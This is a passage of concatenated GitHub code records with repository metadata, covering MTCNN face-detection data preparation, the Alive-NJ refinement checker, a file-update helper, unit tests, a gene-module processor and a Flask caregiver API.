create_mtcnn_net(p_model_path=pnet_model_file, r_model_path=rnet_model_file, use_cuda=use_cuda)\n mtcnn_detector = MtcnnDetector(pnet=pnet, rnet=rnet, min_face_size=12)\n\n imagedb = ImageDB(anno_file,mode=\"test\",prefix_path=prefix_path)\n imdb = imagedb.load_imdb()\n image_reader = TestImageLoader(imdb,1,False)\n\n all_boxes = list()\n batch_idx = 0\n\n print('size:%d' % 
image_reader.size)\n for databatch in image_reader:\n if batch_idx % 50 == 0:\n print(\"%d images done\" % batch_idx)\n\n im = databatch\n\n t = time.time()\n\n # pnet detection = [x1, y1, x2, y2, score, reg]\n p_boxes, p_boxes_align = mtcnn_detector.detect_pnet(im=im)\n\n t0 = time.time() - t\n t = time.time()\n # rnet detection\n boxes, boxes_align = mtcnn_detector.detect_rnet(im=im, dets=p_boxes_align)\n\n t1 = time.time() - t\n print('cost time pnet--',t0,' rnet--',t1)\n t = time.time()\n\n if boxes_align is None:\n all_boxes.append(np.array([]))\n batch_idx += 1\n continue\n if vis:\n rgb_im = cv2.cvtColor(np.asarray(im), cv2.COLOR_BGR2RGB)\n vision.vis_two(rgb_im, boxes, boxes_align)\n\n \n all_boxes.append(boxes_align)\n batch_idx += 1\n\n save_path = './model_store'\n\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n save_file = os.path.join(save_path, \"detections_%d.pkl\" % int(time.time()))\n with open(save_file, 'wb') as f:\n cPickle.dump(all_boxes, f, cPickle.HIGHEST_PROTOCOL)\n\n\n gen_onet_sample_data(data_dir,anno_file,save_file,prefix_path)\n\n\n\ndef gen_onet_sample_data(data_dir,anno_file,det_boxs_file,prefix):\n\n neg_save_dir = os.path.join(data_dir, \"48/negative\")\n pos_save_dir = os.path.join(data_dir, \"48/positive\")\n part_save_dir = os.path.join(data_dir, \"48/part\")\n\n for dir_path in [neg_save_dir, pos_save_dir, part_save_dir]:\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n\n # load ground truth from annotation file\n # format of each line: image/path [x1,y1,x2,y2] for each gt_box in this image\n\n with open(anno_file, 'r') as f:\n annotations = f.readlines()\n\n image_size = 48\n net = \"onet\"\n\n im_idx_list = list()\n gt_boxes_list = list()\n num_of_images = len(annotations)\n print(\"processing %d images in total\" % num_of_images)\n\n for annotation in annotations:\n annotation = annotation.strip().split(' ')\n im_idx = os.path.join(prefix,annotation[0])\n\n boxes = list(map(float, annotation[1:]))\n boxes = np.array(boxes, dtype=np.float32).reshape(-1, 4)\n im_idx_list.append(im_idx)\n gt_boxes_list.append(boxes)\n\n save_path = './anno_store'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n f1 = open(os.path.join(save_path, 'pos_%d.txt' % image_size), 'w')\n f2 = open(os.path.join(save_path, 'neg_%d.txt' % image_size), 'w')\n f3 = open(os.path.join(save_path, 'part_%d.txt' % image_size), 'w')\n\n det_handle = open(det_boxs_file, 'rb')\n\n det_boxes = cPickle.load(det_handle)\n print(len(det_boxes), num_of_images)\n # assert len(det_boxes) == num_of_images, \"incorrect detections or ground truths\"\n\n # index of neg, pos and part face, used as their image names\n n_idx = 0\n p_idx = 0\n d_idx = 0\n image_done = 0\n for im_idx, dets, gts in zip(im_idx_list, det_boxes, gt_boxes_list):\n if image_done % 100 == 0:\n print(\"%d images done\" % image_done)\n image_done += 1\n if gts.shape[0]==0:\n continue\n if dets.shape[0] == 0:\n continue\n img = cv2.imread(im_idx)\n dets = convert_to_square(dets)\n dets[:, 0:4] = np.round(dets[:, 0:4])\n\n for box in dets:\n x_left, y_top, x_right, y_bottom = box[0:4].astype(int)\n width = x_right - x_left + 1\n height = y_bottom - y_top + 1\n\n # ignore box that is too small or beyond image border\n if width < 20 or x_left < 0 or y_top < 0 or x_right > img.shape[1] - 1 or y_bottom > img.shape[0] - 1:\n continue\n\n # compute intersection over union(IoU) between current box and all gt boxes\n Iou = IoU(box, gts)\n cropped_im = img[y_top:y_bottom + 1, x_left:x_right + 1, :]\n 
resized_im = cv2.resize(cropped_im, (image_size, image_size),\n interpolation=cv2.INTER_LINEAR)\n\n # save negative images and write label\n if np.max(Iou) < 0.3:\n # Iou with all gts must below 0.3\n save_file = os.path.join(neg_save_dir, \"%s.jpg\" % n_idx)\n f2.write(save_file + ' 0\\n')\n cv2.imwrite(save_file, resized_im)\n n_idx += 1\n else:\n # find gt_box with the highest iou\n idx = np.argmax(Iou)\n assigned_gt = gts[idx]\n x1, y1, x2, y2 = assigned_gt\n\n # compute bbox reg label\n offset_x1 = (x1 - x_left) / float(width)\n offset_y1 = (y1 - y_top) / float(height)\n offset_x2 = (x2 - x_right) / float(width)\n offset_y2 = (y2 - y_bottom) / float(height)\n\n # save positive and part-face images and write labels\n if np.max(Iou) >= 0.65:\n save_file = os.path.join(pos_save_dir, \"%s.jpg\" % p_idx)\n f1.write(save_file + ' 1 %.2f %.2f %.2f %.2f\\n' % (\n offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n p_idx += 1\n\n elif np.max(Iou) >= 0.4:\n save_file = os.path.join(part_save_dir, \"%s.jpg\" % d_idx)\n f3.write(save_file + ' -1 %.2f %.2f %.2f %.2f\\n' % (\n offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n d_idx += 1\n f1.close()\n f2.close()\n f3.close()\n\n\n\ndef model_store_path():\n return os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))+\"/model_store\"\n\n\ndef get_Onet_data(pnet_model, rnet_model):\n gen_onet_data(traindata_store, annotation_file, pnet_model_file = pnet_model, rnet_model_file = rnet_model,prefix_path=prefix_path,use_cuda = True, vis = False)\n\n\ndef assembel_Onet_data():\n anno_list = []\n\n anno_list.append(onet_postive_file)\n anno_list.append(onet_part_file)\n anno_list.append(onet_neg_file)\n anno_list.append(onet_landmark_file)\n\n chose_count = assemble_data(imglist_filename_onet ,anno_list)\n print(\"ONet train annotation result file path:%s\" % imglist_filename_onet)\n\n\ndef gen_landmark_48(anno_file, data_dir, prefix = ''):\n\n\n size = 48\n image_id = 0\n\n landmark_imgs_save_dir = os.path.join(data_dir,\"48/landmark\")\n if not os.path.exists(landmark_imgs_save_dir):\n os.makedirs(landmark_imgs_save_dir)\n\n anno_dir = './anno_store'\n if not os.path.exists(anno_dir):\n os.makedirs(anno_dir)\n\n landmark_anno_filename = \"landmark_48.txt\"\n save_landmark_anno = os.path.join(anno_dir,landmark_anno_filename)\n\n # print(save_landmark_anno)\n # time.sleep(5)\n f = open(save_landmark_anno, 'w')\n # dstdir = \"train_landmark_few\"\n\n with open(anno_file, 'r') as f2:\n annotations = f2.readlines()\n\n num = len(annotations)\n print(\"%d total images\" % num)\n\n l_idx =0\n idx = 0\n # image_path bbox landmark(5*2)\n for annotation in annotations:\n # print imgPath\n\n annotation = annotation.strip().split(' ')\n\n assert len(annotation)==15,\"each line should have 15 element\"\n\n im_path = os.path.join('./data_set/face_landmark/CNN_FacePoint/train/',annotation[0].replace(\"\\\\\", \"/\"))\n\n gt_box = list(map(float, annotation[1:5]))\n # gt_box = [gt_box[0], gt_box[2], gt_box[1], gt_box[3]]\n\n\n gt_box = np.array(gt_box, dtype=np.int32)\n\n landmark = list(map(float, annotation[5:]))\n landmark = np.array(landmark, dtype=np.float)\n\n img = cv2.imread(im_path)\n # print(im_path)\n assert (img is not None)\n\n height, width, channel = img.shape\n # crop_face = img[gt_box[1]:gt_box[3]+1, gt_box[0]:gt_box[2]+1]\n # crop_face = cv2.resize(crop_face,(size,size))\n\n idx = idx + 1\n if idx % 100 == 0:\n print(\"%d images done, landmark images: 
%d\"%(idx,l_idx))\n # print(im_path)\n # print(gt_box)\n x1, x2, y1, y2 = gt_box\n gt_box[1] = y1\n gt_box[2] = x2\n # time.sleep(5)\n\n # gt's width\n w = x2 - x1 + 1\n # gt's height\n h = y2 - y1 + 1\n if max(w, h) < 40 or x1 < 0 or y1 < 0:\n continue\n # random shift\n for i in range(10):\n bbox_size = np.random.randint(int(min(w, h) * 0.8), np.ceil(1.25 * max(w, h)))\n delta_x = np.random.randint(-w * 0.2, w * 0.2)\n delta_y = np.random.randint(-h * 0.2, h * 0.2)\n nx1 = max(x1 + w / 2 - bbox_size / 2 + delta_x, 0)\n ny1 = max(y1 + h / 2 - bbox_size / 2 + delta_y, 0)\n\n nx2 = nx1 + bbox_size\n ny2 = ny1 + bbox_size\n if nx2 > width or ny2 > height:\n continue\n crop_box = np.array([nx1, ny1, nx2, ny2])\n cropped_im = img[int(ny1):int(ny2) + 1, int(nx1):int(nx2) + 1, :]\n resized_im = cv2.resize(cropped_im, (size, size),interpolation=cv2.INTER_LINEAR)\n\n offset_x1 = (x1 - nx1) / float(bbox_size)\n offset_y1 = (y1 - ny1) / float(bbox_size)\n offset_x2 = (x2 - nx2) / float(bbox_size)\n offset_y2 = (y2 - ny2) / float(bbox_size)\n\n offset_left_eye_x = (landmark[0] - nx1) / float(bbox_size)\n offset_left_eye_y = (landmark[1] - ny1) / float(bbox_size)\n\n offset_right_eye_x = (landmark[2] - nx1) / float(bbox_size)\n offset_right_eye_y = (landmark[3] - ny1) / float(bbox_size)\n\n offset_nose_x = (landmark[4] - nx1) / float(bbox_size)\n offset_nose_y = (landmark[5] - ny1) / float(bbox_size)\n\n offset_left_mouth_x = (landmark[6] - nx1) / float(bbox_size)\n offset_left_mouth_y = (landmark[7] - ny1) / float(bbox_size)\n\n offset_right_mouth_x = (landmark[8] - nx1) / float(bbox_size)\n offset_right_mouth_y = (landmark[9] - ny1) / float(bbox_size)\n\n\n # cal iou\n iou = IoU(crop_box.astype(np.float), np.expand_dims(gt_box.astype(np.float), 0))\n # print(iou)\n if iou > 0.65:\n save_file = os.path.join(landmark_imgs_save_dir, \"%s.jpg\" % l_idx)\n cv2.imwrite(save_file, resized_im)\n\n f.write(save_file + ' -2 %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f \\n' % \\\n (offset_x1, offset_y1, offset_x2, offset_y2, \\\n offset_left_eye_x,offset_left_eye_y,offset_right_eye_x,offset_right_eye_y,offset_nose_x,offset_nose_y,offset_left_mouth_x,offset_left_mouth_y,offset_right_mouth_x,offset_right_mouth_y))\n # print(save_file)\n # print(save_landmark_anno)\n l_idx += 1\n\n f.close()\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Get data',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--net', dest='net', help='which net to show', type=str)\n parser.add_argument('--pnet_path', default=\"./model_store/pnet_epoch_20.pt\",help='path to pnet model', type=str)\n parser.add_argument('--rnet_path', default=\"./model_store/rnet_epoch_20.pt\",help='path to rnet model', type=str)\n parser.add_argument('--use_cuda', default=True,help='use cuda', type=bool)\n\n args = parser.parse_args()\n return args\n\n#-----------------------------------------------------------------------------------------------------------------------------------------------#\nif __name__ == '__main__':\n args = parse_args()\n dir = 'anno_store'\n if not os.path.exists(dir):\n os.makedirs(dir)\n if args.net == \"pnet\":\n wider_face(txt_from_path, anno_file)\n get_Pnet_data()\n assembel_Pnet_data()\n elif args.net == \"rnet\":\n get_Rnet_data(args.pnet_path)\n assembel_Rnet_data()\n elif args.net == \"onet\":\n get_Onet_data(args.pnet_path, args.rnet_path)\n gen_landmark_48(annotation_file_lm, traindata_store, prefix_path_lm)\n 
assembel_Onet_data()","repo_name":"Enderfga/mtCNN_sysu","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":32179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"20910424236","text":"'''\nRefinement checking for optimizations.\n'''\n\nfrom . import config\nfrom . import error\nfrom . import smtinterp\nimport z3\nimport glob\nimport logging\nimport time\nfrom .language import *\nfrom .z3util import mk_and, mk_not, mk_forall\n\nlogger = logging.getLogger(__name__)\n\nPRESAFE, TGTSAFE, UB, POISON, UNEQUAL = range(5)\n\ndef check(opt, type_model, encoding=config.encoding, assume_inhabited=False):\n \"\"\"Check that opt is a refinement for the given type_model.\n Raises Error if the opt is not a refinement. Returns false if opt\n is trivial (that is, the precondition cannot be satisfied. Otherwise,\n returns true.\n\n Keywords:\n encoding: specify an encoding using a string or SMTEncoder class\n assume_inhabited: if true, do not check whether the precondition is satisfied.\n \"\"\"\n logger.info('Checking refinement of %r', opt.name)\n\n encoding = smtinterp.lookup(encoding)\n smt = encoding(type_model)\n\n asm = smt.conjunction(opt.asm)\n premise = asm.aux + asm.safe + asm.value\n if asm.defined or asm.nonpoison:\n raise Exception('Defined/Non-poison condition declared by assumption')\n\n pre = smt.conjunction(opt.pre)\n premise += pre.aux\n if pre.defined or pre.nonpoison:\n raise Exception('Defined/Non-poison condition declared by precondition')\n\n src = smt(opt.src)\n if src.aux:\n raise Exception('Auxiliary condition declared by source')\n\n tgt = smt(opt.tgt)\n premise += tgt.aux\n\n def check_expr(stage, expr):\n m = satisfiable(expr, opt.name, _stage_name[stage])\n if m is not None:\n raise CounterExampleError(stage, m, type_model, opt.src, src.value,\n tgt.value, encoding)\n\n if pre.safe:\n check_expr(PRESAFE, mk_and(premise + [mk_not(pre.safe)]))\n\n premise += pre.value\n\n inhabited = assume_inhabited or \\\n satisfiable(mk_and(premise), opt.name, 'inhabited') is not None\n\n if tgt.safe:\n check_expr(TGTSAFE, mk_and(premise + [mk_not(tgt.safe)]))\n\n premise += src.defined\n if config.poison_undef:\n premise += src.nonpoison\n\n if tgt.defined:\n expr = premise + [mk_not(tgt.defined)]\n check_expr(UB, mk_forall(src.qvars, expr))\n\n if not config.poison_undef:\n premise += src.nonpoison\n\n if tgt.nonpoison:\n check_expr(POISON, mk_forall(src.qvars, premise + [mk_not(tgt.nonpoison)]))\n\n check_expr(UNEQUAL,\n mk_forall(src.qvars, premise + [z3.Not(src.value == tgt.value)]))\n\n return inhabited\n\n\n_stage_name = {\n PRESAFE: 'precondition safety',\n TGTSAFE: 'target safety',\n UB: 'undefined behavior',\n POISON: 'poison',\n UNEQUAL: 'equality',\n}\n\nheader = '''(set-info :source |\n Generated by Alive-NJ\n More info in N. P. Lopes, D. Menendez, S. Nagarakatte, J. Regehr.\n Provably Correct Peephole Optimizations with Alive. In PLDI'15.\n|)\n'''\n\n\ndef satisfiable(expr, opt_name='', stage=''):\n \"\"\"Return a model satisfying the SMT expression, if any. Return None if\n the expression is unsatisfiable. 
Raise Error if the solver cannot determine\n satisfiability.\n \"\"\"\n s = z3.Solver()\n if config.timeout is not None:\n s.set('timeout', config.timeout)\n s.add(expr)\n logger.debug('%s check for %s\\n%s', stage, opt_name, s)\n\n time_start = time.time()\n res = s.check()\n time_end = time.time()\n\n solve_time = time_end - time_start\n\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug('\\nresult: %s\\ntime: %s\\nstats\\n%s', res, solve_time,\n s.statistics())\n\n if config.bench_dir and solve_time >= config.bench_threshold:\n files = glob.glob(config.bench_dir + '/*.smt2')\n filename = '{0}/{1:03d}.smt2'.format(config.bench_dir, len(files))\n logger.debug('Writing benchmark file %r', filename)\n fd = open(filename, 'w')\n fd.write(header)\n fd.write('; {0} check for {1!r}\\n'.format(stage, opt_name))\n fd.write('; time: {0} s\\n\\n'.format(solve_time))\n fd.write(s.to_smt2())\n fd.close()\n\n if res == z3.sat:\n m = s.model()\n logger.debug('counterexample: %s', m)\n\n return m\n\n if res == z3.unknown:\n raise Error('Model returned unknown: ' + s.reason_unknown())\n\n return None\n\n\ndef format_z3val(val):\n if isinstance(val, z3.BitVecNumRef):\n w = val.size()\n u = val.as_long()\n s = val.as_signed_long()\n\n if u == s:\n return '0x{1:0{0}x} ({1})'.format((w+3)/4, u)\n return '0x{1:0{0}x} ({1}, {2})'.format((w+3)/4, u, s)\n\n if isinstance(val, z3.FPRef):\n return str(val)\n\nclass Error(error.Error):\n pass\n\nclass CounterExampleError(Error):\n def __init__(self, cause, model, types, src, srcv, tgtv, trans):\n self.cause = cause\n self.model = model\n self.types = types\n self.src = src\n self.srcv = srcv\n self.tgtv = tgtv\n self.trans = trans\n\n cause_str = {\n PRESAFE: 'Precondition is unsafe',\n TGTSAFE: 'Target is unsafe',\n UB: 'Target introduces undefined behavior',\n POISON: 'Target introduces poison',\n UNEQUAL: 'Mismatch in values',\n }\n\n def __str__(self):\n\n smt = self.trans(self.types)\n\n vars = [v for v in proper_subterms(self.src)\n if isinstance(v, (Input, Instruction))]\n\n ty_width = 1\n name_width = 1\n rows = []\n for v in vars:\n ty = str(self.types[v])\n ty_width = max(ty_width, len(ty))\n\n name = v.name\n name_width = max(name_width, len(name))\n\n interp = smt(v)\n\n if z3.is_false(self.model.evaluate(mk_and(interp.nonpoison))):\n # FIXME: make sure interp.nonpoison fully evaluates\n # e.g., what if it depends on a qvar somehow?\n rows.append((ty, name, 'poison'))\n\n else:\n val = self.model.evaluate(smt.eval(v), model_completion=True)\n # this will pick arbitrary values for any source qvars or\n # other unconstrained values\n\n rows.append((ty, name, format_z3val(val)))\n\n interp = smt(self.src)\n if z3.is_false(self.model.evaluate(mk_and(interp.nonpoison))):\n srcval = 'poison'\n else:\n srcval = format_z3val(self.model.evaluate(self.srcv, True))\n\n if self.cause == UB:\n tgtval = 'undefined'\n elif self.cause == POISON:\n tgtval = 'poison'\n else:\n tgtval = format_z3val(self.model.evaluate(self.tgtv, True))\n\n return '''{cause} for {srcty} {src}\n\nExample:\n{table}\nsource: {srcval}\ntarget: {tgtval}'''.format(\n cause = self.cause_str[self.cause],\n srcty = self.types[self.src],\n src = self.src.name,\n table = '\\n'.join(\n '{0:>{1}} {2:{3}} = {4}'.format(ty, ty_width, name, name_width, val)\n for ty, name, val in rows),\n srcval = srcval,\n tgtval = tgtval,\n 
)\n","repo_name":"rutgers-apl/alive-nj","sub_path":"alive/refinement.py","file_name":"refinement.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"94"} +{"seq_id":"31494880346","text":"\nimport requests\nimport io\nfrom ede.ede._logger import logger\n\nimport os\nimport sys\nfrom git import Repo\n\n\nclass updateFiles:\n def __init__(self, args=None):\n self.args = args\n logger.info(\n f\"typo de argumento: {type(self.args)}, valores: {self.args}\")\n self.filesDict = {\n '1cicAFFfrVQPfqh7j40So3bQqvrte_LtdPwTHLXh8F_A': './ede/ede/RegistroEDE.csv'\n }\n self.localRepoDirectory = os.path.join(os.getcwd())\n self.destination = 'master'\n\n def execute(self):\n if os.path.exists(self.localRepoDirectory):\n logger.info(\n f'Directorio existe, se actualizarán los archivos. {self.localRepoDirectory}')\n try:\n repo = Repo(self.localRepoDirectory)\n except:\n logger.error(\n f'Por favor verifique que exista el directorio \".git\" en {self.localRepoDirectory}')\n return False\n origin = repo.remotes.origin\n origin.pull(self.destination)\n else:\n logger.info(\n 'Directorio no existe, se clonará repositorio completo desde https://github.com/Admin-EDE/DockerEdeCode')\n Repo.clone_from(\"https://github.com/Admin-EDE/DockerEdeCode\",\n self.localRepoDirectory, branch=self.destination)\n\n for idFile, fileName in self.filesDict.items():\n self.downloadFile(idFile, fileName)\n\n def downloadFile(self, idFile: str, fileName: str) -> str:\n urlFile = f'http://drive.google.com/uc?export=download&id={idFile}'\n urlFile2 = f'https://docs.google.com/spreadsheets/d/{idFile}/export?format=csv&id={idFile}'\n if \"--debug\" in sys.argv:\n http.client.HTTPConnection.debuglevel = 1\n\n logger.info(\n f'Intentando descargar archivo: {fileName} desde url: {urlFile}')\n try:\n if (idFile == '1cicAFFfrVQPfqh7j40So3bQqvrte_LtdPwTHLXh8F_A'):\n response = requests.get(urlFile2)\n else:\n response = requests.get(urlFile)\n response.raise_for_status()\n except Exception as e:\n pathFile = None\n logger.error(f'No se pudo descargar el arhivo {fileName}. 
\\n {e}')\n else:\n if not os.path.exists('./ede/ede'):\n os.makedirs('./ede/ede')\n if not os.path.exists('./csv'):\n os.makedirs('./csv')\n\n with open(fileName, 'wb') as out:\n # Read bytes into file\n out.write(io.BytesIO(response.content).read())\n pathFile = fileName\n logger.info(f'Arhivo {pathFile} guardado con éxito.')\n\n return pathFile\n","repo_name":"Admin-EDE/DockerEdeCode","sub_path":"ede/ede/updateFiles.py","file_name":"updateFiles.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"94"} +{"seq_id":"7686658696","text":"from pytest_mock import mocker\n\nfrom modules.DBRepo.ActorDBRepo import ActorDBRepo\nfrom modules.entities.Actor import Actor\nfrom modules.usecases.ActorUsecases import ActorUsecases\nfrom tests.domain.ActorBuilder import ActorMother\n\n\nclass TestActorsUsecase:\n def test_get_one_success(self, simple_actor):\n # arrange\n test_id = simple_actor.id\n usecase = ActorUsecases(ActorDBRepo())\n expected_actor = ActorDBRepo.decode_orm_actor(simple_actor)\n\n # act\n result_actors = usecase.get_actor(test_id)\n\n # assert\n assert result_actors.first_name == expected_actor.first_name\n assert result_actors.last_name == expected_actor.last_name\n\n def test_get_one_no_result(self):\n usecase = ActorUsecases(ActorDBRepo())\n\n result_actors = usecase.get_actor(1)\n assert result_actors is None\n\n def test_get_one_wrong_params(self):\n usecase = ActorUsecases(ActorDBRepo())\n\n result_actors = usecase.get_actor(-100)\n assert result_actors is None\n","repo_name":"ansushina/web_bmstu","sub_path":"backend/tests/app/integration/usecase/test_actors_usecase.py","file_name":"test_actors_usecase.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15780901032","text":"import re\n\nclass Data_Processer:\n\tdef data_extract(self, infile, deletes):\n\t\tf = open(infile, 'r')\n\t\tlines = f.readlines()\n\t\tdict_array = {}\n\t\tsplit_l = ((lines[5]).rstrip()).split('\\t')\n\t\tfor i in range(len(split_l)):\n\t\t\tdict_array['arr_'+str(i)] = []\n\t\tif (deletes == 0):\n\t\t\tfor l in lines:\n\t\t\t\tsplit_l = (l.rstrip()).split('\\t')\n\t\t\t\tfor x in range(len(split_l)):\n\t\t\t\t\tdict_array['arr_'+str(x)].append(split_l[x])\n\t\telif (deletes > 0):\n\t\t\tfor l in lines[deletes:]:\n\t\t\t\tsplit_l = (l.rstrip()).split('\\t')\n\t\t\t\tfor x in range(len(split_l)):\n\t\t\t\t\tdict_array['arr_'+str(x)].append(split_l[x])\n\t\tf.close(); #print(dict_array);\n\t\treturn dict_array\n\n\tdef DEG_Cluster(self, infile, outfile):\n\t\tf = open(outfile,'w')\n\t\tdict1 = self.data_extract(infile,1)\n\t\tgene_ids, fold_change, pval = dict1['arr_0'], dict1['arr_2'], dict1['arr_6']\n\t\tfor i in range(len(fold_change)):\n\t\t\tif ((float(fold_change[i]) >= 1) and (float(pval[i]) <= 0.05)):\n\t\t\t\tf.write(gene_ids[i]+\"\\t\")\n\t\t\tif ((float(fold_change[i]) <= -1) and (float(pval[i]) <= 0.05)):\n\t\t\t\tf.write(gene_ids[i]+\"\\t\")\n\t\tf.write(\"\\n\"); f.close();\n\n\tdef Module_Clusters(self, infile, outfile1, outfile2):\n\t\tdict2 = self.data_extract(infile,1)\n\t\tgenes_ids, modules = dict2['arr_0'], dict2['arr_1']\n\t\tgenes = [ids.replace('\"','') for i, ids in enumerate(genes_ids)]\n\n\t\tmods = []\n\t\tfor module in modules:\n\t\t\tif int(module) not in mods:\n\t\t\t\tmods.append(int(module))\n\t\tmods.sort()\n\t\tx = 0; gene=[];\n\t\tfile2 = open(outfile1,'w'); file3 = 
open(outfile2,'w');\n\t\tfor mod in mods:\n\t\t\tfile2.write(str(mod)+\"\\t\")\n\t\t\tfor x in range(len(modules)):\n\t\t\t\tif (int(modules[x]) == int(mod)):\n\t\t\t\t\tgene.append(genes[x])\n\t\t\t\t\tfile2.write(genes[x]+\"\\t\"); file3.write(genes[x]+\"\\t\");\n\t\t\tfile2.write(\"\\n\"); file3.write(\"\\n\");\n\t\tfile2.close(); file3.close();\n\n\tdef DEGClusters_2_WGCNAModules(self, infile1, infile2, outfile1, infile3, outfile2):\n\t\t# All DEGs\n\t\tfile1 = open(infile1,'r'); file3 = open(outfile1,'w'); file5 = open(outfile2,'w');\n\t\tline1 = file1.readline()\n\t\tDEG_transcripts = []; indices = [];\n\t\twhile line1:\n\t\t\tline1 = line1.rstrip()\n\t\t\tsplit_line1 = line1.split('\\t')\n\t\t\tfor tids in split_line1:\n\t\t\t\tDEG_transcripts.append(tids)\n\t\t\tDEG_transcripts.append('\\n')\n\t\t\tline1 = file1.readline()\n\n\t\tfor items in range(len(DEG_transcripts)):\n\t\t\tif DEG_transcripts[items] == '\\n':\n\t\t\t\tindices.append(items); print(items)\n\n\t\t# Modules using WGCNA\n\t\tdict3 = self.data_extract(infile2,1) \n\t\tgene_ids, modules = dict3['arr_0'], dict3['arr_1']\n\t\tgene_id = [val.replace('\"','') for i, val in enumerate(gene_ids)]\n\t\t\n\t\tk = 0; DEG1_Module = [];\n\t\tfor genes in DEG_transcripts:\n\t\t\tif (k < int(indices[0])):\t# Cluster of DEGs\n\t\t\t\tif (genes in gene_id):\n\t\t\t\t\tindexes = gene_id.index(genes); print(indexes, genes, gene_id[indexes]);\n\t\t\t\t\tDEG1_Module.append(modules[indexes])\n\t\t\t\t\tfile3.write(gene_id[indexes]+\"\\t\"+modules[indexes]+\"\\n\")\n\t\t\tk += 1\n\n\t\tfile3.close(); file1.close();\n\n\t\tdict4 = self.data_extract(infile3,0) \n\t\tgeneid, mod = dict4['arr_0'], dict4['arr_1']\n\n\t\tmodset = sorted(set(mod), reverse=False); print(modset);\n\t\tfor i in modset:\n\t\t\tfile5.write(str(i)+'\\t')\n\t\t\tindices = [index for index, element in enumerate(mod) if element == i]; #print(i, indices);\n\t\t\tm = 0\n\t\t\tfor j in indices:\n\t\t\t\tm += 1; print(geneid[j], mod[j])\n\t\t\t\tif m < len(indices):\n\t\t\t\t\tfile5.write(geneid[j]+',')\n\t\t\t\telif m == len(indices):\n\t\t\t\t\tfile5.write(geneid[j]+'\\n')\n\n\t\tfile5.close();\n\nif __name__ == \"__main__\":\n\tData_Processer().DEG_Cluster('CF_Vs_LB_Significant.txt', 'PAO1_Cluster_DEG_BiologicalReplicates.txt')\n\tData_Processer().Module_Clusters('Module_Assignment_PAO1_WGCNA.tsv', 'PAO1_Modules_Clusters.txt', 'WGCNA_PAO1_Modules_Clusters.txt')\n\tData_Processer().DEGClusters_2_WGCNAModules('PAO1_Cluster_DEG_BiologicalReplicates.txt', 'Module_Assignment_PAO1_WGCNA.tsv', 'PAO1_DEG_Modules.txt', 'PAO1_DEG_Modules.txt', 'PAO1_DEG_Genes_Modules.txt')\n\n\n\n","repo_name":"Ronika19/PAO1_Network","sub_path":"Cystic_Fibrosis/CF_LB/Data_Process.py","file_name":"Data_Process.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"19558427630","text":"import json\nfrom flask import Blueprint, jsonify, request, make_response, current_app\nfrom psycopg2.extras import DictCursor\nfrom db import close_db, get_db\n\ncaregiver_bp = Blueprint('caregiver', __name__)\n\n@caregiver_bp.route(\"/mycaregiver/<phone>\", methods=[\"GET\"])\ndef get_mycaregivers(phone):\n    try:\n        # Connect to the PostgreSQL database\n        conn = get_db()\n        cursor = conn.cursor(cursor_factory=DictCursor)\n\n        # Fetch the caregivers related to the phone number\n        cursor.execute(\n            \"SELECT * FROM caregivers WHERE phone = %s ORDER BY id DESC\", (phone,))\n        rows = cursor.fetchall()\n\n        # Close the connection\n        
cursor.close()\n\n if not rows:\n return jsonify({\"error\": \"Caregivers not found\"}), 404\n\n caregivers = [\n {\n \"id\": row[\"id\"],\n \"name\": row[\"name\"],\n \"years_of_experience\": row[\"years_of_experience\"],\n \"age\": row[\"age\"],\n \"education\": row[\"education\"],\n \"gender\": row[\"gender\"],\n \"phone\": row[\"phone\"],\n \"imageurl\": row[\"imageurl\"],\n \"location\": row[\"location\"]\n }\n for row in rows\n ]\n\n return jsonify(caregivers)\n except Exception as e:\n current_app.logger.error(\n f\"Error fetching caregivers for phone {phone}\", exc_info=True)\n return jsonify({\"error\": \"Failed to fetch caregivers\"}), 500\n\n\n@caregiver_bp.route(\"/mycaregiver/\", methods=[\"PUT\"])\ndef update_caregiver(id):\n current_app.logger.debug(f\"Entering update_caregiver for id {id}\")\n try:\n data = request.get_json()\n\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor()\n\n # Define the columns and values for the UPDATE query\n # Added location to the list\n columns = [\"name\", \"location\"]\n # Using .get() to avoid KeyError\n values = []\n\n for field in columns:\n value = data.get(field, None)\n if field == 'location' and isinstance(value, list):\n # Serialize dict to JSON string\n values.append(json.dumps(value))\n else:\n values.append(value)\n\n current_app.logger.debug(f\"Serialized location: {json.dumps(value)}\")\n current_app.logger.debug(f\"Prepared values for SQL update: {values}\")\n\n # Construct the UPDATE query\n update_query = \"UPDATE caregivers SET \" + \\\n ', '.join([f\"{col} = %s\" for col in columns]) + f\" WHERE id = {id}\"\n\n # Execute the UPDATE query with the values\n cursor.execute(update_query, values)\n\n current_app.logger.info(f\"Received data: {data}\")\n current_app.logger.info(f\"Executing query: {update_query}\")\n\n # Commit the changes and close the connection\n conn.commit()\n cursor.close()\n\n return jsonify({\"success\": \"更新成功\"}), 200\n\n except Exception as e:\n current_app.logger.error(\n f\"Error updating caregiver: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to update caregiver\"}), 500\n\n\n@caregiver_bp.route('/all_caregivers', methods=['GET'])\ndef get_all_caregivers():\n current_app.logger.info(\n \"---------------Entering GET 